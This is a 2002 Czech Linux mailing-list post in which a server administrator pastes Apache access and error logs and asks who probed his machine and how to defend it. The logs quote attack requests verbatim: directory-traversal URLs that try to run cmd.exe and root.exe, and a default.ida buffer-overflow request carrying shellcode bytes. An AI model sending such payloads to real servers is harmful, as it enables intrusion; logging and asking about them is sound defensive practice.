Apache logy -- hack -- bespecnost

adam_1 na centrum.cz adam_1 na centrum.cz
Úterý Únor 19 12:50:42 CET 2002


Hello linux,

  Dobry den kdyz jsem si dnes prochazel logy z Apache tak jsem narazil
  na nektere veci ktere se mi docela nezdaji nesel by se tu nekdo zvas
  kdo by mi rekl kdo a o co se pokousel. Popripade jestli se necim
  takovym da zmocnit /bin/bash (nechci rici root protoze staci i jiny
  uzivatel a pres neho je otazka par hodin se dostat k root). V
  pripade ze se nejakym timto spusobem da dostat dovnitr jaka je
  obrana?
Tohle jsem nasel v souboru /var/log/httpd/access_log
----------------------------------------------------------------------------------
212.32.196.115 - - [18/Feb/2002:19:48:11 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
212.90.237.190 - - [18/Feb/2002:20:34:09 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
212.90.237.190 - - [18/Feb/2002:20:34:12 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
212.90.237.190 - - [18/Feb/2002:20:34:19 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
212.90.237.190 - - [18/Feb/2002:20:34:23 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
212.90.237.190 - - [18/Feb/2002:20:34:30 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
212.90.237.190 - - [18/Feb/2002:20:34:36 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
213.10.1.40 - - [19/Feb/2002:11:56:40 +0100] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 322 "-" "-"

Dalsi soubor ktery mne zaujal je /var/log/httpd/error_log
----------------------------------------------------------------------------------
[Mon Feb 18 19:48:11 2002] [error] [client 212.32.196.115] File does not exist: /var/www/html/scripts/root.exe
[Mon Feb 18 20:34:09 2002] [error] [client 212.90.237.190] File does not exist: /var/www/html/scripts/root.exe
[Mon Feb 18 20:34:12 2002] [error] [client 212.90.237.190] File does not exist: /var/www/html/MSADC/root.exe
[Mon Feb 18 20:34:19 2002] [error] [client 212.90.237.190] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Mon Feb 18 20:34:23 2002] [error] [client 212.90.237.190] File does not exist: /var/www/html/d/winnt/system32/cmd.exe
[Mon Feb 18 20:34:30 2002] [error] [client 212.90.237.190] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Mon Feb 18 20:34:36 2002] [error] [client 212.90.237.190] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

Potom si jeste vedu logy o neopravnenych pristupech a tam se nekdo
pokousel o portmaper,ssh a ftp o nic jineho.

Kdyz si predstavim ze jsem pro spojeni s internetem pouzival WinNT tak
mi beha mraz po zadech kam vsude se mi tito hekrici mohly dostat.

                                       Moc diky Adam.

-- 
Best regards,
 adam                          mailto:adam_1 na centrum.cz




Další informace o konferenci Linux